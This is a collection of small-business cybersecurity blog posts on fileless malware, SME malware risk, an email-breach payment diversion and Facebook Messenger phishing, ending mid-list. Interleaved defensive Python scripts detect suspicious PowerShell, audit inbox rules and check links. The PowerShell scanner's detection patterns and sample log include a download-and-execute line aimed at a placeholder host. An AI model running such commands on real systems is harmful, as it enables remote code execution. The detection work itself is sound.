What is fileless malware and how can you safeguard your systems?


The most elusive of all malware, fileless malware is a threat you can’t afford to let slip off your radar. It accounts for 40% of global malware, according to research from Arctic Wolf Labs, and attacks increased by an eye-watering 1,400% between 2022 and 2023.

The next time you’re assessing cybersecurity priorities, keep protecting your business from these furtive attacks front of mind. 

What is fileless malware?

Fileless malware is malicious code that’s written to your RAM or legitimate system tools rather than your disk (SSD or hard drive). Essentially, it uses your system’s software, applications, or protocols to launch an attack. Technically, it’s not actually fileless, but the name comes from where the code is stored and the fact it uses what already exists in the system. 

The hacker uses the malicious code to gain access to your systems, executes it by piggybacking on legitimate scripts and tools, and then steals credentials, encrypts files, or does whatever else they’ve set out to do as part of the attack.
Because the code is stored in memory, it generally disappears when you reboot your system (unless the hacker uses more advanced tactics to make the malware persist across restarts). This makes the malware incredibly difficult to spot, and security teams and antivirus software may never notice it or find out what caused the problem.

Want to know more about the threats facing small businesses like yours? Check out our latest report on SMEs and the cost of living crisis.

Some fileless malware techniques

Living off the land binaries (aka LoLBins)

LoLBins primarily refer to pre-installed Windows binary tools used for default system operations. PowerShell, a Windows scripting language, is an example of this. However, hackers can take advantage of them to launch attacks and avoid detection. 

Memory code injection

A memory code injection inserts malicious code directly into the memory of a running process rather than writing it to disk.

Fileless malware examples

Operation Cobalt Kitty

OceanLotus Group, who also go by APT32, targeted an international company based in Asia. The long-term attack compromised more than 40 computers and multiple servers. 

They used Windows PowerShell, the built-in automation and configuration management tool, as an entry point for malicious code, and manipulated network management services so that it would persist on systems rather than being deleted on start-up. The group penetrated the organisation via spear-phishing emails to senior employees that encouraged them to click on malicious links or download weaponised documents.

Fritz Frog

Fritz Frog is a fileless and serverless peer-to-peer botnet and worm that uses brute force to access secure shell (SSH) servers.  

In January 2020, the cybercriminals behind it launched an attack that lasted for eight months, affecting 24,000 SSH servers from government, education, healthcare, and private enterprises.

Once the malware had compromised a server, it replicated itself and spawned threads with different goals: one would brute-force its way into more targets while another deployed the payload. The aim was to run a cryptocurrency miner on the compromised servers, mining Monero for the attackers.

Code Red 

Identified as the first-ever fileless attack, Code Red spread worldwide in 2001 and affected more than 300,000 servers.

The worm exploited a vulnerability in Windows systems running Microsoft’s IIS web server software, affecting users of Windows NT and Windows 2000, and caused websites hosted on the web server to display incorrectly.

According to a Sophos threat researcher, Microsoft released a patch to protect against the vulnerability just a month before the attack, showcasing the importance of updating software as soon as patches are available. 

How to protect your business

Fileless malware is particularly tricky to detect because it’s written into memory or trusted, legitimate code. That means standard antivirus software doesn’t always detect a problem. And, in cases where the code is written to memory and wiped on restart, there’s no trace of the malicious code to work from. 

However, there are some steps you can take to look after your cyber hygiene and give your business the best defence against malware in general, including fileless malware. 

Patch your systems

Just like Code Red, unpatched vulnerabilities in operating systems, browsers, and software are a breeding ground for cyber threats. To counter this, install patches and security updates as soon as they’re available to give your business the best protection. 

Continuous logging and monitoring 

It’s important to stay on top of any security incidents so you have a full understanding of your IT infrastructure. It’s also important to monitor your systems for any unusual activity so you can respond to potential threats quickly and limit the damage. This can be difficult to do in-house unless you’re a very big business with lots of cybersecurity experience, but there are many options for third parties to monitor your security for 24/7 protection.
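Living-off-the-land tools such as PowerShell, mentioned above, leave little on disk, so the logs are where the evidence lives. The Python script below is an added example (not code from the original post or from CyberSmart) of the kind of check a monitoring service would run over those logs. It assumes PowerShell Script Block Logging (Windows event ID 4104, switched on through Group Policy) is enabled and that the events have been exported as one JSON object per line; the field names and the sample records are constructed for the example.

```python
"""Flag suspicious PowerShell activity in exported script block logs.

Added example for this post, not code from the original article or from
any vendor. It assumes PowerShell Script Block Logging (Windows event
ID 4104) is enabled and that the events have been exported as one JSON
object per line with the fields 'event_id', 'host', 'user' and
'script_block'. Those field names and the sample records below are
constructed for this example.
"""
import base64
import json
import re

# Behaviours worth a second look when a "living off the land" tool such
# as PowerShell is being abused: encoded command lines, hidden console
# windows, and code fetched from the network straight into memory.
# Each pattern carries a short label for the analyst.
INDICATORS = [
    (re.compile(r"-enc(?:odedcommand)?\b", re.I), "encoded command"),
    (re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), "hidden window"),
    (re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", re.I),
     "network download"),
    (re.compile(r"\biex\b|invoke-expression", re.I), "dynamic code execution"),
    (re.compile(r"frombase64string", re.I), "base64 decoding"),
]


def decode_encoded_command(script_block):
    """Return the plain text of a -EncodedCommand argument, or None.

    PowerShell encodes the argument as base64 over UTF-16LE text, so the
    decode reverses both steps. Malformed input yields None rather than an
    exception, because log data is untrusted.
    """
    match = re.search(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{8,})",
                      script_block, re.I)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse_record(record):
    """Return the indicator labels that fire on one log record."""
    block = record.get("script_block", "")
    hits = [label for pattern, label in INDICATORS if pattern.search(block)]
    decoded = decode_encoded_command(block)
    if decoded is not None:
        # Re-run the checks on the decoded payload so that encoding alone
        # cannot hide a download from the rules.
        hits += [label + " (inside encoded command)"
                 for pattern, label in INDICATORS if pattern.search(decoded)]
    return hits


def scan_log(lines):
    """Return one finding per 4104 record that trips at least one indicator."""
    findings = []
    for line in lines:
        if not line.strip():
            continue
        record = json.loads(line)
        if record.get("event_id") != 4104:
            continue
        hits = analyse_record(record)
        if hits:
            findings.append({
                "host": record.get("host"),
                "user": record.get("user"),
                "hits": hits,
                "decoded": decode_encoded_command(record.get("script_block", "")),
            })
    return findings


# Constructed sample log. The encoded record is built here from a harmless
# command so that the decoder can be checked against a known input.
SAMPLE_COMMAND = "Write-Host 'constructed sample'"
SAMPLE_ENCODED = base64.b64encode(SAMPLE_COMMAND.encode("utf-16-le")).decode()
SAMPLE_LOG = [
    json.dumps({"event_id": 4104, "host": "WS01", "user": "alice",
                "script_block": "Get-ChildItem C:\\Users\\alice\\Documents"}),
    json.dumps({"event_id": 4104, "host": "WS02", "user": "bob",
                "script_block": f"powershell.exe -nop -w hidden -enc {SAMPLE_ENCODED}"}),
    json.dumps({"event_id": 4104, "host": "WS03", "user": "carol",
                "script_block": "IEX (Invoke-WebRequest http://example.invalid/x).Content"}),
    json.dumps({"event_id": 4103, "host": "WS03", "user": "carol",
                "script_block": "IEX (Invoke-WebRequest http://example.invalid/x).Content"}),
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(f"{finding['host']} / {finding['user']}: {', '.join(finding['hits'])}")
        if finding["decoded"]:
            print("  decoded command:", finding["decoded"])
```

Treat the hits as triage prompts rather than verdicts: administrators legitimately use encoded commands, so the value is in seeing who ran what, and the decoded text, in one place, while the logging itself is what survives a reboot when the code in memory does not.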

Education

To avoid threats, your people need to understand them. And the same is true for fileless malware. So, make cybersecurity training regular, bitesize, and as fun as possible. It’s not about fearmongering, it’s about arming your teams with knowledge. 

Endpoint protection

An endpoint is a device that connects to and exchanges information with a computer network. Endpoint protection includes measures such as device encryption, perimeter security on cloud storage, network access control, anti-malware, and more. 

Get Cyber Essentials certified

Cyber Essentials is a government-backed scheme with a simple framework based on five technical controls. Many of these controls include actions that overlap with our other tips in this section, so you can tick more off your to-do list in one go. 

  1. Secure configuration
  2. Malware protection
  3. Network firewalls
  4. User access controls
  5. Security update management

It’s a great starting point for businesses looking to improve their cybersecurity credentials before moving on to more complex and costly certifications like ISO 27001. And, if you’re unsure which option is best for you, start by reading our free guide to certifications in the UK.

The fight against fileless malware

Hopefully, these tips help you to feel more confident about protecting your business against fileless malware. 

However, as with all threats, fileless malware is ever-evolving. One way to ensure you stay cyber confident is to keep updated with information on new threats. Our report on SMEs and the cost of living crisis tells you everything you need to know about how small businesses are tackling cybersecurity during an economic downturn. Read it here.


Why small businesses are at greater risk of malware attacks


Malware attacks are a well-known concern for businesses, but what type of business is more at risk?

Small businesses are just as much at risk as large enterprises. In fact, 54% of SMEs reported experiencing between one and five cyberattacks in a 12-month period.

Let’s explore why. 

Small businesses and malware attacks

Small and medium-sized businesses (SMEs) are less likely to have robust protocols in place to mitigate a malware attack. They might not be aware of the risks, understand what a malware attack looks like, or have the ability to react if one occurs.

And cybercriminals take advantage of unprepared businesses: 43% of cyberattacks target SMEs. Their entry points might not be as closely guarded as a larger company’s, and employees might not know what to do if an attack occurs, or even be able to identify it in the first place. Most notably, 75% of SMBs could not continue operating if they were hit with ransomware.

The cost of living crisis has hit small businesses particularly hard. But what does this mean for SMEs’ cybersecurity? Find out in our latest report. 

The types of malware attack

Every malware attack will look slightly different, which makes attacks hard to identify. To help you stay aware, let’s take a look at the most common types.

  • Ransomware works by grabbing your attention. It disables your company’s data using encryption until a financial ransom is paid.
  • Spyware collects information from targets without their knowledge. It’s unknowingly downloaded and installed onto your devices.
  • Adware displays intrusive advertisements that reappear when closed. It’s usually delivered as a high number of pop-ups that disrupt your systems.
  • Trojan malware is disguised as something it’s not. Users unknowingly download it, believing it to be legitimate software. 
  • Mobile malware works by installing itself onto your mobile devices. This can be an issue if you use a mobile to access sensitive business data.
  • Bots perform automated tasks on demand. Once they make their way onto your system, they run malicious tasks automatically.
  • Worms access your systems through software vulnerabilities, which is why it’s important to keep systems up to date.
  • Keyloggers monitor keystrokes on infected devices to collect sensitive information, like passwords. 
  • Fileless malware hijacks software and tools you already use. 

A stage-by-stage breakdown of a malware attack

Every malware attack is different, but some of them follow a similar pattern. Learning how to spot a malware attack is key to preventing one before it’s too late.

Here’s a breakdown of what you can expect.

1. Gathering information

A cybercriminal is unlikely to target a business that they know has tough defences. So they’ll start the process by gathering information on your business. 

They’ll identify the systems or software that you use and any potential vulnerabilities. If they find some, then your business is more likely to be a target. 

2. Targeting

The cybercriminal will make their choice of malware to target you with. 

They’ll conduct their activities to begin infiltrating your organisation. For example, they might start sending phishing emails with malware attached to them. This will depend on the type of malware they choose. Be aware that malware can be incredibly sophisticated, so this type of attack can come from a device, email, software, or any channel in your business.

3. Delivery

The attacker will spread the malware to your business. This could be across your systems and software, or directly to employees. Hackers only need a single vulnerability to get in, so they will try as many entry points as possible.

4. Exploitation

This is when the malware is triggered. It establishes a foothold on your systems by exploiting the vulnerabilities it has found. Malware can also begin to replicate itself, alter your systems, and even autonomously update the cybercriminal on its progress.

The malware will begin to disrupt your systems, software, and people. It can also steal sensitive information. 

How can your small business avoid malware attacks?

SMEs are inherently more at risk as they’re less likely to have robust cybersecurity measures in place. However, it doesn’t have to stay that way.

You can mitigate the risk of a cybercriminal choosing your business by:

  • Improving employee training
  • Implementing data encryption
  • Using firewalls
  • Managing user access
  • Updating software and operating systems
  • Obtaining a cybersecurity certification

If you’re wondering how you can achieve all these steps fast, then a cybersecurity certification is the answer. It requires your business to comply with a strict set of cybersecurity measures to qualify. Therefore, it’s an easy way to make sure you’re following best practices. 

It incorporates every step, from employee training to regulating firewalls, so that no cybersecurity measure is overlooked. So when malicious cybercriminals find your business, you’re less likely to be a target.

Want to know more about the threats facing small businesses and how they’re dealing with them? Check out our research on SMEs and the cost of living crisis. 


Lessons from a breached email and inheritance theft


We all spend almost every day plugged into our emails. For most of us, this is our primary source of communication with the rest of the world – whether for work or our personal lives.

However, despite its utility, email communications can have a darker side. This blog will help answer what threats exist, why email security matters, and, most importantly, what can be done to defend against these threats. Plus, we will look at a real-life case in which email was used to steal hundreds of thousands of pounds.

What vulnerabilities could exist in my email security?

So, what vulnerabilities could exist when using your email? The first and greatest threat is phishing. I won’t discuss this further, as there is already lots of good information available about phishing, including this blog post.

Phishing also has a close cousin. We’ve all received an email at some point from what appears, on first look, to be a legitimate sender. For instance, you might receive an email from an address at ‘arnazon.com’ asking you to update your card details. It looks legitimate if you just glance at it (which is what cybercriminals are banking on) but leads to a fake corporate website which cybercriminals will use to steal your financial information. This is known as ‘spoofing’. 

Another vulnerability, which extends beyond email, is weak authentication. In layman’s terms, this is having a poor password: one that is either short or easily guessable, such as a piece of information that is known about you, for example your pet’s name or your birth date.

This information can be used to launch further threats, such as man-in-the-middle attacks. This involves intercepting and potentially altering email communication between two parties to deceive or scam one or both parties.

Of course, these are only a few of the many vulnerabilities that exist, but they give us an idea of what is out there.

Did you know that 49% of SME leaders feel more at risk of cyberattack since the beginning of the cost of living crisis? Read our new report to find out why.

What are the possible impacts of these vulnerabilities?

It’s easy to assume that email security is not your greatest concern. Why would anyone want to attack you? Well, there are many reasons. Whether you are using your personal email or work email, these are some of the possible impacts you could experience:

Identity Theft

Identity theft can lead to financial losses for you or your business, reputational damage and even legal issues.

Malware Infections

A successful malware attack could lead to the loss of important proprietary or customer data. This could prevent your business from being able to operate.

Data Breach

Sensitive information could be stolen and used against you. This could be intellectual property whose loss disadvantages your business, and it could see your business breach regulations, face legal consequences, and receive fines.

The breached email and inheritance theft

Whilst working as a cybercrime detective in the police, I dealt with many cases that involved email as the attack method.

One such case involved a firm of solicitors. As you can imagine, security is a top priority considering the sensitive data solicitors process, and this firm had done almost everything right. They had a business-owned domain and an IT team to look after it and ensure security.

The firm’s security measures included IP whitelisting (which will be key in a minute). ‘Whitelisting’ is a security strategy that prevents users from logging into internal company platforms from anywhere other than ‘trusted locations’. For example, a ‘trusted location’ could be your head office or coworking space. In this case, there was only one trusted location, the solicitors’ office. 

What went wrong? 

Due to the pressures of the job, one solicitor in the firm decided to work outside of the office in the evenings and on weekends. To do this, they created a new email account using the solicitors’ business name.

Here’s where things go wrong.

Unfortunately, this account was discovered by a cybercriminal and a weak password allowed them access to the inbox. The cybercriminal noticed one conversation that piqued their interest. The solicitor was dealing with an inheritance case and was working with the deceased’s family to distribute assets and money from the deceased’s will. 

The cybercriminals hijacked this conversation, adding a forwarding rule so that any responses were forwarded into a concealed folder. This prevented the solicitor from seeing them and allowed the messages to be altered and dropped back into the solicitor’s inbox.

The cybercriminals intercepted an email from one of the family members containing a document which detailed the bank account the inheritance money was supposed to be transferred to. Seeing this, the bad guys pounced, changing the bank details to their own.

The solicitor logged this information and continued with the formalities. A few days later, the money was transferred and the cybercriminals found themselves hundreds of thousands of pounds richer.

How to protect yourself when using email

So, what can you do to protect yourself? 

The good news is, by reading this blog you’ve taken the first step by improving your awareness. Understanding what types of threats exist and being alive to this ever-present danger will ensure that you start from the best possible place.

But it doesn’t stop there. Education is an ongoing process and if we truly want to protect ourselves, learning shouldn’t be something we do once a year. So keep working on your cybersecurity knowledge. This could be through security training or simply through reading blogs like this. 

As we saw in the case above, weak authentication was the gateway to this attack. Using strong passwords is crucial. This can be achieved by using the three random words principle, as recommended by the NCSC.

On top of this, use multi-factor authentication (MFA). This attack, and others like it, could have been foiled with this extra layer of protection. 

Finally, it is worth speaking with your IT teams to make sure that they have implemented technical controls. These include email filtering, to identify and block malicious content before it reaches you, as well as technologies like SPF (Sender Policy Framework) and DMARC (Domain-based Message Authentication, Reporting, and Conformance) to authenticate email sources.
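The case above turned on a forwarding rule the solicitor never saw, and the controls named here (SPF and DMARC) are what stop a forged sender reaching the family in the first place. As an added example (not code from the original post or from CyberSmart), the Python below performs two checks an IT team could run: an audit of exported mailbox rules for the diversion pattern in the case, and a sanity check of a domain’s SPF and DMARC records. The field names, the organisation domain and the sample records are this example’s own assumptions; an Exchange Online Get-InboxRule export could be mapped onto the rule fields.

```python
"""Audit inbox rules and sender-authentication records for an email domain.

Added example for this post, not code from the original article. It assumes
the mailbox rules have been exported as a list of dictionaries with the
fields 'name', 'enabled', 'forward_to', 'move_to_folder', 'delete',
'mark_as_read' and 'subject_contains' (this example's own field names).
The SPF and DMARC checks take the raw TXT record text, so everything runs
offline against the constructed records below.
"""

# Constructed organisation domain for the example.
ORG_DOMAIN = "example-solicitors.test"

# Subject keywords typical of payment-diversion cases such as the
# inheritance case above; a rule keyed on these deserves a look.
PAYMENT_KEYWORDS = {"bank", "payment", "invoice", "transfer", "inheritance"}


def is_external(address, org_domain=ORG_DOMAIN):
    """True when the address belongs to a domain other than the organisation's."""
    return address.rsplit("@", 1)[-1].lower() != org_domain.lower()


def find_suspicious_rules(rules, org_domain=ORG_DOMAIN):
    """Return (rule name, reasons) for every enabled rule that looks like
    mail diversion: external forwarding, hiding matching mail from the
    user, deleting it, or targeting payment-related subjects."""
    findings = []
    for rule in rules:
        if not rule.get("enabled", True):
            continue
        reasons = []
        external = [a for a in rule.get("forward_to", []) if is_external(a, org_domain)]
        if external:
            reasons.append("forwards to external address(es): " + ", ".join(external))
        folder = rule.get("move_to_folder")
        # Moving mail out of the Inbox and marking it read is how the
        # concealed folder in the case kept replies out of sight.
        if folder and folder.lower() != "inbox" and rule.get("mark_as_read"):
            reasons.append(f"moves matching mail to '{folder}' and marks it read, hiding it")
        if rule.get("delete"):
            reasons.append("deletes matching mail")
        keywords = {k.lower() for k in rule.get("subject_contains", [])} & PAYMENT_KEYWORDS
        if keywords:
            reasons.append("matches payment-related subjects: " + ", ".join(sorted(keywords)))
        if reasons:
            findings.append((rule["name"], reasons))
    return findings


def check_spf(txt):
    """Return weaknesses found in an SPF TXT record (empty list = acceptable)."""
    terms = txt.split()
    if not terms or terms[0].lower() != "v=spf1":
        return ["not an SPF record"]
    last = terms[-1].lower()
    if last in ("+all", "all"):
        return ["'+all' lets any server send as this domain"]
    if last == "?all":
        return ["'?all' is neutral: receivers will not reject forged mail"]
    if last == "~all":
        return ["'~all' is softfail only; move to '-all' once every legitimate sender is listed"]
    if last != "-all":
        return ["record does not end with an 'all' mechanism"]
    return []


def check_dmarc(txt):
    """Return weaknesses found in a DMARC TXT record (empty list = acceptable)."""
    tags = {}
    for part in txt.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    if tags.get("v") != "DMARC1":
        return ["not a DMARC record"]
    issues = []
    policy = tags.get("p")
    if policy is None:
        issues.append("missing required 'p' tag")
    elif policy.lower() == "none":
        issues.append("p=none only monitors; forged mail is still delivered")
    if "rua" not in tags:
        issues.append("no 'rua' address, so aggregate reports are never received")
    return issues


# Constructed sample data: one ordinary filing rule, one diversion rule of
# the kind seen in the case, and one disabled leftover.
SAMPLE_RULES = [
    {"name": "File newsletters", "enabled": True, "forward_to": [],
     "move_to_folder": "Newsletters", "delete": False, "mark_as_read": False,
     "subject_contains": ["newsletter"]},
    {"name": "Rule 1", "enabled": True, "forward_to": ["mailbox@freemail.invalid"],
     "move_to_folder": "Archive", "delete": False, "mark_as_read": True,
     "subject_contains": ["bank", "transfer", "inheritance"]},
    {"name": "Old out-of-office", "enabled": False, "forward_to": ["me@freemail.invalid"],
     "move_to_folder": None, "delete": False, "mark_as_read": False, "subject_contains": []},
]
SAMPLE_SPF = "v=spf1 include:_spf.example.invalid ~all"
SAMPLE_DMARC = "v=DMARC1; p=none; rua=mailto:dmarc@example-solicitors.test"

if __name__ == "__main__":
    for name, reasons in find_suspicious_rules(SAMPLE_RULES):
        print(f"rule '{name}':")
        for reason in reasons:
            print("  -", reason)
    print("SPF:", check_spf(SAMPLE_SPF) or ["ok"])
    print("DMARC:", check_dmarc(SAMPLE_DMARC) or ["ok"])
```

Run the rule audit across every mailbox on a schedule, not once: the rule in the case was added after the account was already compromised, so a one-off review at onboarding would have missed it. The DNS checks are deliberately strict about p=none and ~all because either setting leaves forged mail deliverable.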

Want to know more about the threats faced by small businesses like yours? Then check out our latest research report on how the cost of living crisis is impacting SMEs.


Key takeaways from the CyberSmart SME cost of living crisis report


The current economic climate has seen better days, but how are the UK’s small businesses weathering the storm? At CyberSmart, we’re curious about how the cost of living crisis has impacted cybersecurity and people in small businesses.

We tasked Censuswide with surveying 1,000 UK SMEs to find out how they’re coping. What followed is our ‘SME cost of living crisis report’. It explores:

  • How confident businesses are about weathering the economic storm
  • The financial limitations impacting businesses
  • The impact on employees
  • The key impacts on cybersecurity
  • The state of cybersecurity investments 
  • How SMEs can approach cybersecurity in the cost of living crisis

Despite economic conditions, cybersecurity in your business doesn’t need to be all doom and gloom. Our report gives you the knowledge and understanding of the current climate to proactively protect your business. To help you, here are our key takeaways from the report. 

Want to read the report in full? Get your copy here.

1. Cost-conscious businesses are looking for value

Small businesses must be cost-conscious. Careful budgeting and knowing when to invest is key to survival. And this means many small business leaders won’t invest in cybersecurity unless they know the payoff is worthwhile. 

Understanding the benefits of strong cybersecurity is key in these conditions. Without a good level of understanding, decision-makers will overlook its importance.


2. Economic uncertainty raises threat levels 

Even though businesses are overlooking the importance of cybersecurity, nearly half of UK SMEs (47%) believe they’re at greater risk of a cyberattack since the onset of the cost of living crisis. 

Economic uncertainty has led to mistrust, too. 38% of leaders are worried about malicious insider threats from employees, while 32% blame higher rates of supply chain fraud. It seems that mistrust comes from inside and outside.

This is why increasing cybersecurity protocols and governance offers real business value. It provides much-needed reassurance that business data is safe, no matter where threats come from.


3. The employee skill gap is causing mistrust

Your employees are a line of defence when it comes to cybersecurity. But you must equip them with the tools and knowledge to counter potential attacks. 

80% of respondents said that their employees do not fully understand why it is important to keep confidential information secure. And this lack of cybersecurity knowledge is the leading reason for mistrust.

The cybersecurity knowledge skills gap is a prominent factor for uncertainty. Of the 620 SME leaders who claimed to trust their employees, 25% still believe that staff pose the greatest security risk.

4. SMEs are missing important cybersecurity policies 

We noticed that a lack of trust in employees, their cybersecurity knowledge, and no clear internal policies have an underlying impact on small businesses, so we did some digging.

Only 54% of SMEs have clear policies and procedures for sharing information and gaining access to confidential information. This means that just under half of SMEs don’t have important cybersecurity policies, at all. 


It’s not surprising that leaders demonstrate a lack of trust in their employees, especially when there’s no guidance for the employees in the first place. Here, cybersecurity concerns appear as a vicious circle: there’s an important gap in employee knowledge and a lack of policies.

5. Basic measures can help to protect businesses

The report reveals that fixing basic, underlying issues can help alleviate the cybersecurity concerns arising from the cost of living crisis. These issues are:

  • Lack of employee cybersecurity training and resulting cyber confidence 
  • Missing cybersecurity policies, or too few policies 
  • Misunderstanding of the value of cybersecurity tools 

Luckily, investing in cybersecurity doesn’t have to cost the earth. Instead, SMEs must be smart about their investments and increase cyber confidence for their employees.


Our report takes an in-depth look at these steps and how SMEs can implement them. These steps can help increase cyber confidence in your business and protect against cybersecurity threats.

Cyber confidence is key in the cost of living crisis

Uncertain economic conditions can make even the most stable business leaders feel on edge. Improving cybersecurity governance can help decision-makers protect their business and provide much-needed reassurance that their cybersecurity is under control. 

Read our report today to learn more about the current concerns of SMEs in the cost of living crisis, and how to mitigate cybersecurity threats.


New: CyberSmart’s SME cost of living crisis report


At CyberSmart, we recognise that the cost of living crisis not only affects our personal lives, but the way small and medium businesses (SMEs) manage their priorities, too. 

Uncertainty is never the best feeling for any business leader. A dampened economic outlook can result in SMEs becoming more cost-conscious and less growth-minded. And we’re concerned about the impact on cybersecurity. 

That’s why our latest insight, the SME cost of living crisis report, explores its impact on SMEs, leadership, the workforce, and business cybersecurity.

What’s in the report?

We tasked Censuswide with surveying 1,000 UK SMEs to reveal the current state of the cybersecurity landscape for SMEs. 

The report is full of helpful statistics, figures, and insights that reveal the behaviours of decision-makers during the cost of living crisis.

In the report, you’ll learn about:

  • What’s driving decision-making in the cost of living crisis?
  • The impact on cybersecurity investments 
  • Leadership behaviours and mistrust of employees
  • Cybersecurity policy and governance factors
  • How should SMEs approach cybersecurity in the cost of living crisis?

Discover CyberSmart’s SME cost of living crisis report. Learn more about the impact on cybersecurity, people, and more. Read it today.

Discover key insights about the cybersecurity landscape

At CyberSmart, we work to make cybersecurity simple and accessible to everyone. We aim to provide every business, no matter how small, the tools to protect themselves against cybersecurity threats easily and effectively.

That’s why we’ve incorporated our expert insight into the report, too. We deep-dive into the reasoning behind the report’s findings to support the facts and figures. This provides you with a better understanding of the current SME cybersecurity landscape. 

For example, the report reveals that nearly half of UK SMEs (47%) believe they’re at greater risk of a cyberattack since the onset of the cost of living crisis. Why? External threats, insider threats, employee mistrust, and employee negligence are all driving this behaviour, and we explore this in the report. Read it for free today to get the latest insights into SME cybersecurity during the cost of living crisis.


How to avoid phishing scams on Facebook Messenger for Business


Almost since its birth, Facebook has been an important tool for small businesses. It’s a low-cost way to sell your services, interact with customers and build a community around your business.

However, wherever small businesses gather in any number, so too do cybercriminals, like predators at a savanna watering hole. Facebook for Business is no different. Over the past few years, the social media app’s messaging service has become a regular launchpad for phishing campaigns. And, unfortunately, the problem is only getting worse, with social media account takeovers increasing by over 1,000% in the past year.

However, this doesn’t mean you need to avoid the app altogether (as we said, it’s a useful tool). With the right knowledge, you can get back to communicating confidently. So, here’s everything you need to know about Facebook Messenger scams – what they look like, the consequences of a breach, and how to combat them.

What does a Facebook Messenger phishing scam look like?

Like most phishing attacks, Facebook Messenger scams typically rely on social engineering. But, there are a few different approaches out there.

Complete cyber confidence doesn’t have to break the bank. Download our guide to protecting your business on a budget to find out more.

The classic Facebook scam

First of all, there is what we call the ‘classic’ Facebook messenger scam. This is a well-worn approach but don’t let that fool you. ‘Well worn’ doesn’t mean ineffective even if it lacks sophistication. A surprising number of businesses still get caught out by this tactic.

Scammers will usually pretend to be potential customers or partners and try to trick you into giving them sensitive information. It could be a prospective ‘partner’ who just needs some financial data before they can commit, or it could be a customer who’s seemingly desperate for you to check out their website (don’t click the link!).

The Facebook support team scam

Recently, we’ve seen a far more insidious scam on the platform. Scammers have begun posing as Facebook support or security teams.

This scam typically starts with a message claiming your business page is at risk of being banned or disabled due to violations. The message will seem urgent and official, often using Facebook branding and logos. There will be a link provided to supposedly “verify your account” or appeal violations. Unsurprisingly, this link doesn’t unlock your account or clear your business’s name; it’ll usually lead straight to a bogus site that’ll infect your device with malware.

Another potential avenue for this kind of scam is to claim your business needs to ‘top up’ the funds paid for any on-site advertising you might be running. Once again, this will lead you to a spoofed Facebook page where you’ll be requested to enter sensitive financial details. If you’re unfortunate, like us, you might have received a flood of these messages in recent months. They usually look something like this:

(Screenshot: example Facebook Messenger scam message)

What are the consequences of a successful scam?

The consequences of falling prey to one of these scams vary, depending on what the cybercriminals managed to persuade the victim to do. However, some of the most common outcomes include:

– Losing control of your business’s social media page to hackers who then use it to post malicious content or launch further scams

– Financial loss, either through the initial scam or a subsequent ransomware attack

– Compromised sensitive personal or proprietary data 

– Reputational damage from all of the above

All in all, being hit with a successful Facebook Messenger scam is something your business desperately needs to avoid. Let’s look at how…

How can you avoid falling victim?

Although the method of attack might be new, Facebook Messenger scams are still a form of phishing. This means that many of the principles that can be used to combat other types of phishing scams can be applied here.

1. Keep Facebook’s policies in mind

Remember that Facebook will never message you proactively about account issues. Any unexpected warnings about your page being banned are very likely scams.

2. Check the URL

Verify that any links come from an official facebook.com or facebookmail.com domain. If you’re unsure, you can hover over links to preview the URL before clicking.
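Hovering over a link shows you the URL, but the host still has to be read correctly, and scammers count on something like facebook.com.evil.example or faceb00k.com passing a glance. The Python function below is an added example (not from the original post or from Facebook) that applies this tip mechanically: it accepts only hosts that are facebook.com or facebookmail.com, or a subdomain of one of them, and explains why anything else fails, including the ‘arnazon’-style letter substitutions mentioned in the email post above. The sample links and the look-alike table are constructed for the example.

```python
"""Decide whether a link points at an official domain before clicking it.

Added example for this post, not code from the original article or from
Facebook. The trusted domains are the two named in the tip above; the
sample links and the look-alike table are constructed for the example.
"""
from urllib.parse import urlsplit

TRUSTED_DOMAINS = ("facebook.com", "facebookmail.com")

# Character substitutions that make one domain read like another, such as
# the 'arnazon.com' spoof mentioned earlier ('rn' standing in for 'm').
CONFUSABLES = (("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l"), ("3", "e"))
HOST_CHARS = set("abcdefghijklmnopqrstuvwxyz0123456789.-")


def within(host, domain):
    """True when host is the domain itself or a subdomain of it (whole labels only)."""
    return host == domain or host.endswith("." + domain)


def mimicked_domain(host, trusted=TRUSTED_DOMAINS):
    """Return the trusted domain that host imitates via look-alike characters, or None."""
    folded = host
    for lookalike, real in CONFUSABLES:
        folded = folded.replace(lookalike, real)
    for domain in trusted:
        if within(folded, domain) and not within(host, domain):
            return domain
    return None


def link_verdict(url, trusted=TRUSTED_DOMAINS):
    """Return (is_trusted, reason) for a URL.

    Matching is by whole label, so 'login.facebook.com' passes while
    'facebook.com.evil.example' and 'facebook.com-security.example' fail.
    Common disguises get an explicit reason so the reader sees why.
    """
    try:
        parts = urlsplit(url.strip())
    except ValueError:
        return False, "unparseable URL"
    scheme = parts.scheme.lower()
    if scheme not in ("http", "https"):
        return False, f"unexpected scheme '{parts.scheme or 'none'}'"
    host = (parts.hostname or "").lower().rstrip(".")
    if not host:
        return False, "no host in URL"
    if parts.username is not None:
        # 'https://facebook.com@evil.example/' puts the real host after the '@'
        return False, f"text before '@' is not the host; real host is '{host}'"
    if host.startswith("xn--") or ".xn--" in host:
        return False, "internationalised (punycode) host; check for look-alike characters"
    if not set(host) <= HOST_CHARS:
        return False, "host contains non-ASCII or unusual characters"
    for domain in trusted:
        if within(host, domain):
            if scheme != "https":
                return False, f"official domain {domain} but the link is not HTTPS"
            return True, f"host '{host}' is within {domain}"
    mimic = mimicked_domain(host, trusted)
    if mimic:
        return False, f"host '{host}' looks like {mimic}"
    return False, f"host '{host}' is not an official domain"


# Constructed sample links of the kinds seen in Messenger scams.
SAMPLE_LINKS = [
    "https://www.facebook.com/business/help",
    "http://facebook.com.evil.example/verify",
    "https://facebook.com@evil.example/",
    "https://faceb00k.com/appeal",
    "https://facebook.com-security.example/",
]

if __name__ == "__main__":
    for link in SAMPLE_LINKS:
        trusted, reason = link_verdict(link)
        print("OK  " if trusted else "STOP", link, "->", reason)
```

The whole-label rule is the important part: a host is only trusted if the official domain is its last two labels exactly, which is why the ‘facebook.com’ at the start of a longer hostname earns nothing. Any link that comes back with STOP is a reason to go to the site by typing the address yourself rather than clicking.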

3. Look for errors

Watch for poor grammar, spelling errors, and other typos. Scammers are rarely gifted writers and you’ll often find telltale slip-ups in their messages.

4. Verify who the sender is

